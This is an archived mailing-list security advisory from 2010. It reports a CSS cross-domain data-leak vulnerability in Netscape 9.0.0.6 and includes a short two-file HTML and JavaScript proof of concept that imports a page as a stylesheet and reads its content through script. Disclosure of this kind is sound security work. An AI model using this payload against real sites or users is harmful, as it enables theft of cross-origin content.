Netscape Web Browser (CSS) Cross Domain Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Subject: Netscape Web Browser (CSS) Cross Domain Vulnerability
From: info@xxxxxxxxxxxxxx
Date: Thu, 23 Sep 2010 10:51:35 -0600

PoC:

1.html:
<body>
{}body{DOM:
Cross Domain Vulnerability

2.html:
<style>
@import url("1.html");
</style>
<script>
setTimeout(function(){
var s = document.body.currentStyle.DOM;
alert(s);
},0);
</script>

Vulnerable:
Netscape v9.0.0.6

By: Securitylab.ir
Original Advisory: http://Securitylab.ir/Advisories

Follow-Ups:
- Re: Netscape Web Browser (CSS) Cross Domain Vulnerability
  - From: Michal Zalewski

Prev by Date: [security bulletin] HPSBMA02583 SSRT100070 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote URL Redirection
Next by Date: Re: Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability
Previous by thread: [security bulletin] HPSBMA02583 SSRT100070 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote URL Redirection
Next by thread: Re: Netscape Web Browser (CSS) Cross Domain Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux